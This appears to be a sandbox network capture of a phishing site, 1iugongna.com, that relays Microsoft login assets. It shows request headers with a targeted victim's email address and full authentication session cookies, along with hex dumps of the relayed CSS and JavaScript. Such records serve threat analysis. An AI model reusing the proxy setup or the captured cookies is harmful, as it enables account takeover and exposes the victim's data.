                                                                              2025-01-10 20:42:00 UTC8809INData Raw: b7 b9 77 ef 6f db 48 d2 46 ff 3f 9f 82 c2 fa 67 03 21 04 4b 4e 32 93 80 46 f8 73 64 7b e2 4c 7c 59 4b 4e 32 23 6b b4 20 01 4a b0 28 80 03 80 b2 35 12 bf fb a9 a7 aa bb d1 b8 50 76 66 e7 9c f7 9d dd 58 20 d0 68 f4 b5 ba ae 4f d9 cf fc 3a f8 14 43 87 ce 8c 5d e8 a2 79 f3 39 cb fa 54 d4 18 08 f8 bd 54 11 0f 51 f0 0b d1 21 72 26 04 42 13 0a 66 12 85 cc 80 77 f4 df d8 e1 27 36 24 08 48 d0 51 1c 68 e9 4b 4c cc 44 11 79 68 de 44 37 5d 9a 0e e0 ab 2d dc 0b 35 6e e3 7f 6a ad 46 3e 16 fa a2 8f 2a 4d b4 15 89 34 04 48 ee ee a2 b0 76 ff a1 9a db 47 39 13 f8 ad 14 f7 8d 1e 3c ee f4 51 84 89 0f 5e c6 ca 83 47 c1 76 38 93 37 c7 47 27 fc 8c 8a bf 8e 3a 14 c8 4d 87 04 6a 98 ad e9 2d 8f 03 09 23 54 20 57 34 17 f4 3d 3c 69 91 2a 05 8a 3c 52 a7 62 7d 1e d7 23 a0 76 57 a3 65
                                                                              Data Ascii: woHF?g!KN2Fsd{L|YKN2#k J(5PvfX hO:C]y9TTQ!r&Bfw'6$HQhKLDyhD7]-5njF>*M4HvG9<Q^Gv87G':Mj-#T W4=<i*<Rb}#vWe
                                                                              2025-01-10 20:42:01 UTC16384INData Raw: f2 fb 53 ee 81 75 50 e6 42 b8 d4 e8 98 fb ad e1 71 79 89 b2 f7 cd 46 65 5f 72 44 eb da 1c 76 93 2e 13 a0 f7 a9 9c fb fa 57 9f 59 c8 aa b7 0d c5 50 84 a2 5f aa d9 f7 4e 87 0e f4 cb 2a da 2c 5c a5 a3 88 80 67 33 3a 62 de b3 1f 24 49 14 df c5 98 c8 94 97 3d 6f 3b 96 84 11 81 a2 93 98 0d 7a 97 95 d0 53 0c 78 97 f9 ad 78 20 49 21 5a 44 ae 28 77 fe 12 bb e5 20 68 1f 54 fa 75 cb e2 a4 c0 76 fa 6f 68 5b e4 95 05 ff 2c 5a 76 54 22 39 23 87 0d fa 70 f1 05 fd 92 7c 92 1c 9c 03 c7 e1 b6 40 e2 31 95 e5 36 20 f5 70 13 32 ff 85 92 a0 03 bb 06 23 eb 14 6c e2 88 ca 26 a4 fe 06 37 c2 9b cd 66 73 87 13 e3 80 71 5b f3 4d d6 e9 c5 1e e3 b0 31 d7 26 c6 d2 d9 c5 67 4d 02 28 50 37 b5 07 14 41 3a a1 6d e9 d0 e1 76 7b fb dd 0f 3a e4 38 d5 44 0f 14 cf f0 4b fa 78 b3 d4 13 46 45 aa
                                                                              Data Ascii: SuPBqyFe_rDv.WYP_N*,\g3:b$I=o;zSxx I!ZD(w hTuvoh[,ZvT"9#p|@16 p2#l&7fsq[M1&gM(P7A:mv{:8DKxFE
                                                                              2025-01-10 20:42:01 UTC788INData Raw: dc 40 09 71 b9 86 c1 e4 0e 8c bc f3 a5 75 21 bd 0f 1d 36 2d ec 9a 6b 49 2e a0 c8 c2 60 ea c1 82 58 87 8c 58 07 24 91 91 cc 11 f0 1f 28 c4 35 cb 22 ea 51 26 b7 ec 2d 09 b8 17 dc d3 ce 6c fd 9c 26 4e 9f 38 f3 36 c6 f9 55 60 39 7b 63 07 d6 50 37 e3 1f 9a 0c b1 03 e4 38 72 46 ae b2 96 da a6 c2 d8 43 a4 31 08 8b fe ba ed 6d 37 d0 86 57 4f 1c 41 fd 06 3b cb 25 e3 45 ca 4a 23 46 ef c0 87 6e 9d 71 a1 dc a3 e3 e9 80 bf 71 fb fb 1e bb 9a e1 4c 1f aa b3 f6 54 eb a9 d2 da f8 a5 a4 1c 48 ac 3d a4 92 ed fc e5 be f2 ea 02 7f a9 18 4b 60 3c a8 ed 33 e8 65 a5 0d 4c 0a 8d 99 78 4f 24 b1 cf 89 cf 2c 7b dc a5 fe d0 90 3c db 03 f9 6f e7 42 c7 1b 85 45 0d f8 59 36 ec 54 af 5e dd c6 79 e5 ae 51 e8 28 53 58 9f 4b d1 f3 37 d4 d2 dd 7c 52 75 8e 2a eb e3 5a 1b 46 0d e2 43 ab b2 89
                                                                              Data Ascii: @qu!6-kI.`XX$(5"Q&-l&N86U`9{cP78rFC1m7WOA;%EJ#FnqqLTH=K`<3eLxO$,{<oBEY6T^yQ(SXK7|Ru*ZFC


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              34192.168.2.549882207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:01 UTC1715OUTGET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: text/css,*/*;q=0.1
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: style
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:02 UTC775INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:02 GMT
                                                                              Content-Type: text/css
                                                                              Content-Length: 20410
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Fri, 08 Nov 2024 04:59:25 GMT
                                                                              ETag: 0x8DCFFB21E496F3A
                                                                              x-ms-request-id: 5a01e044-601e-0023-12ad-606638000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204202Z-1698bcdb8c7wm5kvhC1BL1dp9s0000000bhg00000000qvey
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2025-01-10 20:42:02 UTC15609INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 7d 6b 93 db 36 b2 e8 77 ff 0a ee a4 52 eb c9 4a 8c 48 3d 47 53 49 ad e3 78 93 39 c7 af b2 9d 7d 54 2a b5 c5 91 a8 11 8f 29 51 97 a4 66 3c ab a3 ff 7e f1 46 03 68 90 d4 78 b2 d9 7b 2b eb 8d 2d a2 1b 0d a0 d1 68 a0 81 6e e0 eb af fe 10 3c 2f 76 f7 65 76 b3 ae 83 a7 cf cf 83 57 d9 a2 2c aa 62 55 93 f4 72 57 94 49 9d 15 db 30 78 96 e7 01 43 aa 82 32 ad d2 f2 36 5d 86 c1 57 5f 7f fd d5 1f 9e f4 bb ff 2f 78 ff e1 d9 bb 0f c1 9b bf 04 1f 7e bc 7a f7 7d f0 96 7c fd 23 78 fd e6 c3 d5 f3 17 41 67 2a 4f 9e 7c 58 67 55 b0 ca f2 34 20 ff 5e 27 55 ba 0c 8a 6d 50 94 41 b6 5d 88 5a a7 55 b0 21 7f 97 59 92 07 ab b2 d8 04 f5 3a 0d 76 65 f1 3f e9 82 b4 21 cf aa 9a 64 ba 4e f3 e2 2e 78 4a c8 95 cb e0 6d 52 d6 f7 c1 d5 db f3 30 f8 40 70 0b d2
                                                                              Data Ascii: }k6wRJH=GSIx9}T*)Qf<~Fhx{+-hn</vevW,bUrWI0xC26]W_/x~z}|#xAg*O|XgU4 ^'UmPA]ZU!Y:ve?!dN.xJmR0@p
                                                                              2025-01-10 20:42:02 UTC4801INData Raw: 8b 88 bd ac 2c 12 31 2f 2a 2b 24 e5 a1 95 75 9e df 51 bb 5f 6a 19 63 dc bc c9 45 89 b5 70 47 5d 70 ca fb 9e 0e 20 56 49 be 20 69 14 01 46 49 a3 08 a2 a9 10 de 51 33 ab ab 42 ad 3a 03 51 82 c9 86 58 21 80 b6 66 35 88 5b 0b 1a d2 44 af 18 0e 06 e3 65 32 71 db a4 25 ce 20 03 a5 0f 01 b4 b6 c9 2f 95 2d 68 58 9b 7c d2 ca db f4 30 61 ec 73 a7 f6 1e b8 a8 5b 0e 36 f1 85 8e 36 04 a6 86 1b 02 93 e3 0d 14 66 70 df 93 6e 56 08 83 b4 76 40 43 45 db f0 b0 2e 10 57 99 1b 46 0a 7a 9a 6c 5e eb 5b 91 85 43 fa 34 bc 98 9d 23 97 02 03 20 96 48 ba 89 37 5f 87 50 e3 87 e3 60 22 80 5b d9 23 19 93 28 7f 18 bb 0c ee 13 f6 9e b3 cc 4f 7d b0 93 e5 be fa 81 1c e1 db 81 87 f8 c3 85 9e 97 26 d9 ad e4 e2 f9 d0 f9 26 d9 66 bb 7d ce d8 eb 5e a9 2b 2e 5f 31 9e 3c 14 8e 66 b6 29 6a 84 19
                                                                              Data Ascii: ,1/*+$uQ_jcEpG]p VI iFIQ3B:QX!f5[De2q% /-hX|0as[66fpnVv@CE.WFzl^[C4# H7_P`"[#(O}&&f}^+._1<f)j


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              35192.168.2.549883207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:01 UTC1692OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:02 UTC139INHTTP/1.1 200 OK
                                                                              Content-Length: 689017
                                                                              Content-Type: application/x-javascript
                                                                              Date: Fri, 10 Jan 2025 20:42:01 GMT
                                                                              Connection: close
                                                                              2025-01-10 20:42:02 UTC16245INData Raw: 0a 21 28 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 29 20 7b 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 74 2c 20 69 2c 20 6f 20 3d 20 6e 5b 30 5d 2c 20 72 20 3d 20 6e 5b 31 5d 2c 20 73 20 3d 20 30 2c 20 63 20 3d 20 5b 5d 3b 20 73 20 3c 20 6f 2e 6c 65 6e 67 74 68 3b 20 73 2b 2b 29 0a 20 20 20 20 20 20 28 69 20 3d 20 6f 5b 73 5d 29 2c 0a 20 20 20 20 20 20 20 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 20 69 29 20 26 26 20 61 5b 69 5d 20 26 26 20 63 2e 70 75 73 68 28 61 5b 69 5d 5b 30 5d 29 2c 0a 20 20 20 20 20 20 20 20 28 61 5b 69 5d 20 3d 20 30 29 3b 0a 20 20 20 20 66 6f 72 20 28 74 20 69 6e 20 72 29 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f
                                                                              Data Ascii: !(function (e) { function n(n) { for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++) (i = o[s]), Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]), (a[i] = 0); for (t in r) Object.proto
                                                                              2025-01-10 20:42:02 UTC16384INData Raw: 6f 63 6b 65 64 3a 20 31 30 30 2c 0a 20 20 20 20 20 20 20 20 54 69 6c 65 73 3a 20 31 30 32 2c 0a 20 20 20 20 20 20 20 20 52 65 6d 6f 74 65 43 6f 6e 6e 65 63 74 3a 20 31 30 33 2c 0a 20 20 20 20 20 20 20 20 46 65 64 43 6f 6e 66 6c 69 63 74 3a 20 31 30 35 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 3a 20 31 30 36 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 5f 50 68 6f 6e 65 53 69 67 6e 69 6e 3a 20 31 30 37 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 46 69 6e 69 73 68 3a 20 31 30 38 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 53 74 72 6f 6e 67 41 75 74 68 3a 20 31 30 39 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 48 49 50 5f 4c 6f 67 69 6e 3a 20 31 31
                                                                              Data Ascii: ocked: 100, Tiles: 102, RemoteConnect: 103, FedConflict: 105, Win10Host_Login: 106, Win10Host_Login_PhoneSignin: 107, Win10Host_Finish: 108, Win10Host_StrongAuth: 109, Win10Host_HIP_Login: 11
                                                                              2025-01-10 20:42:02 UTC16384INData Raw: 20 28 50 52 4f 4f 46 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 54 79 70 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 45 6d 61 69 6c 3a 20 31 2c 0a 20 20 20 20 20 20 20 20 20 20 41 6c 74 45 6d 61 69 6c 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 53 4d 53 3a 20 33 2c 0a 20 20 20 20 20 20 20 20 20 20 44 65 76 69 63 65 49 64 3a 20 34 2c 0a 20 20 20 20 20 20 20 20 20 20 43 53 53 3a 20 35 2c 0a 20 20 20 20 20 20 20 20 20 20 53 51 53 41 3a 20 36 2c 0a 20 20 20 20 20 20 20 20 20 20 43 65 72 74 69 66 69 63 61 74 65 3a 20 37 2c 0a 20 20 20 20 20 20 20 20 20 20 48 49 50 3a 20 38 2c 0a 20 20 20 20 20 20 20 20 20 20 42 69 72 74 68 64 61 79 3a 20 39 2c 0a 20 20 20 20 20 20 20 20 20 20 54 4f 54 50 41 75 74 68 65 6e 74 69 63 61 74 6f 72 3a 20 31 30 2c 0a 20 20 20 20 20 20
                                                                              Data Ascii: (PROOF = { Type: { Email: 1, AltEmail: 2, SMS: 3, DeviceId: 4, CSS: 5, SQSA: 6, Certificate: 7, HIP: 8, Birthday: 9, TOTPAuthenticator: 10,
                                                                              2025-01-10 20:42:02 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 6e 20 7c 7c 20 22 22 20 3d 3d 3d 20 6e 20 7c 7c 20 28 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 50 2e 70 61 72 73 65 28 6e 29 3b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 71 75 65 72 79 20 3d 20 74 2e 71 75 65 72 79 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 20 3d 20 73 2e 66 69 6e 64 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 2e 71 75 65 72 79 2c 20 65 2c 20 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 20 3f 20 74 2e 71 75 65 72 79 5b 69 5d 20 3a 20 22 22 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 46 72 6f 6d 43
                                                                              Data Ascii: n || "" === n || (n = document.location.search); var t = P.parse(n); t.query = t.query || {}; var i = s.findOwnProperty(t.query, e, !0); return i ? t.query[i] : ""; }, appendOrReplaceFromC
                                                                              2025-01-10 20:42:02 UTC16384INData Raw: 5d 2f 67 2c 0a 20 20 20 20 20 20 20 20 20 20 67 61 70 2c 0a 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 6e 74 2c 0a 20 20 20 20 20 20 20 20 20 20 6d 65 74 61 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 62 22 3a 20 22 5c 5c 62 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 74 22 3a 20 22 5c 5c 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 6e 22 3a 20 22 5c 5c 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 66 22 3a 20 22 5c 5c 66 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 72 22 3a 20 22 5c 5c 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 22 27 3a 20 27 5c 5c 22 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 5c 22 3a 20 22 5c 5c 5c 5c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: ]/g, gap, indent, meta = { "\b": "\\b", "\t": "\\t", "\n": "\\n", "\f": "\\f", "\r": "\\r", '"': '\\"', "\\": "\\\\", },
                                                                              2025-01-10 20:42:02 UTC16384INData Raw: 20 20 20 20 76 61 72 20 6d 20 3d 20 66 2e 61 64 64 28 64 2c 20 63 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 2e 74 61 72 67 65 74 55 72 6c 20 3d 20 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 61 2e 48 61 6e 64 6c 65 72 2e 63 61 6c 6c 28 6e 2c 20 70 29 2c 20 6e 2e 73 65 6e 64 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 2c 0a 20 20 20 20 20 20 20 20 28 6e 2e 42 65 61 63 6f 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 2c 20 69 2c 20 61 2c 20 6f 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 20 3d 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 76 28 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 70 2e 66 6f 72 45 61 63 68 28
                                                                              Data Ascii: var m = f.add(d, c); p.targetUrl = m; } } a.Handler.call(n, p), n.sendRequest(); }), (n.Beacon = function (e, t, i, a, o) { var r = [], s = v(!0); p.forEach(
                                                                              2025-01-10 20:42:02 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 6e 20 3f 20 28 6c 20 3d 3d 3d 20 70 2e 46 54 45 72 72 6f 72 20 3f 20 68 28 65 2c 20 64 29 20 3a 20 76 28 65 2c 20 64 29 29 20 3a 20 62 28 65 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 67 20 3d 20 22 22 29 2c 20 28 6c 20 3d 20 70 2e 45 72 72 6f 72 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 54 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 6c 20 3d 20 70 2e 54 69 6d 65 6f 75 74 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 28 67 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20
                                                                              Data Ascii: n ? (l === p.FTError ? h(e, d) : v(e, d)) : b(e); } function k() { (g = ""), (l = p.Error), (u = ""), (f = ""), v(d); } function T() { (l = p.Timeout), (u = ""), (f = ""), (g = ""), v(d);
                                                                              2025-01-10 20:42:02 UTC16384INData Raw: 3d 20 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 7b 20 63 72 65 64 54 79 70 65 3a 20 6d 2e 4f 6e 65 54 69 6d 65 43 6f 64 65 2c 20 70 72 6f 6f 66 3a 20 65 20 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 77 69 74 63 68 20 28 28 28 74 2e 70 72 6f 6f 66 2e 69 73 45 6e 63 72 79 70 74 65 64 20 3d 20 21 30 29 2c 20 65 2e 74 79 70 65 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 53 4d 53 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 56 6f 69 63 65 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 2e 69 73 56 6f 69 63 65 4f 6e 6c 79 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: = n) { var t = { credType: m.OneTimeCode, proof: e }; switch (((t.proof.isEncrypted = !0), e.type)) { case PROOF.Type.SMS: case PROOF.Type.Voice: if (!e.isVoiceOnly) {
                                                                              2025-01-10 20:42:02 UTC16384INData Raw: 3d 20 70 2e 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 3f 22 20 2b 20 67 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 77 63 74 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4c 6f 67 69 6e 4f 70 74 69 6f 6e 73 25 33 44 33 25 32 36 22 20 2b 20 70 2e 65 78 74 72 61 63 74 28 22 77 63 74 78 22 2c 20 22 3f 22 20 2b 20 67 65 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 74 20 3d 20 74 2e 73 75 62 73 74 72 28 31 29 29 2c 20 28 65 20 3d 20 70 2e 61 70 70 65 6e 64 28 65 2c 20 74 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: = p.appendOrReplace( "?" + ge, "wctx", "LoginOptions%3D3%26" + p.extract("wctx", "?" + ge) ); (t = t.substr(1)), (e = p.append(e, t));
                                                                              2025-01-10 20:42:02 UTC16384INData Raw: 20 20 28 65 2e 65 78 70 6f 72 74 73 20 3d 20 70 29 3b 0a 20 20 7d 2c 0a 20 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 6e 2c 20 74 29 20 7b 0a 20 20 20 20 76 61 72 20 69 20 3d 20 74 28 32 29 2c 0a 20 20 20 20 20 20 61 20 3d 20 74 28 31 29 2c 0a 20 20 20 20 20 20 6f 20 3d 20 74 28 34 29 2c 0a 20 20 20 20 20 20 72 20 3d 20 74 28 30 29 2c 0a 20 20 20 20 20 20 73 20 3d 20 77 69 6e 64 6f 77 2c 0a 20 20 20 20 20 20 63 20 3d 20 72 2e 44 69 61 6c 6f 67 49 64 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 6e 20 3d 20 74 68 69 73 2c 0a 20 20 20 20 20 20 20 20 74 20 3d 20 65 2e 69 73 50 6c 61 74 66 6f 72 6d 41 75 74 68 65 6e 74 69 63 61 74 6f 72 41 76 61 69 6c 61 62 6c 65 3b 0a 20 20 20 20 20 20 28 6e 2e 6f 6e 52 65 67
                                                                              Data Ascii: (e.exports = p); }, function (e, n, t) { var i = t(2), a = t(1), o = t(4), r = t(0), s = window, c = r.DialogId; function d(e) { var n = this, t = e.isPlatformAuthenticatorAvailable; (n.onReg


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.549884207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:01 UTC1711OUTGET /aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
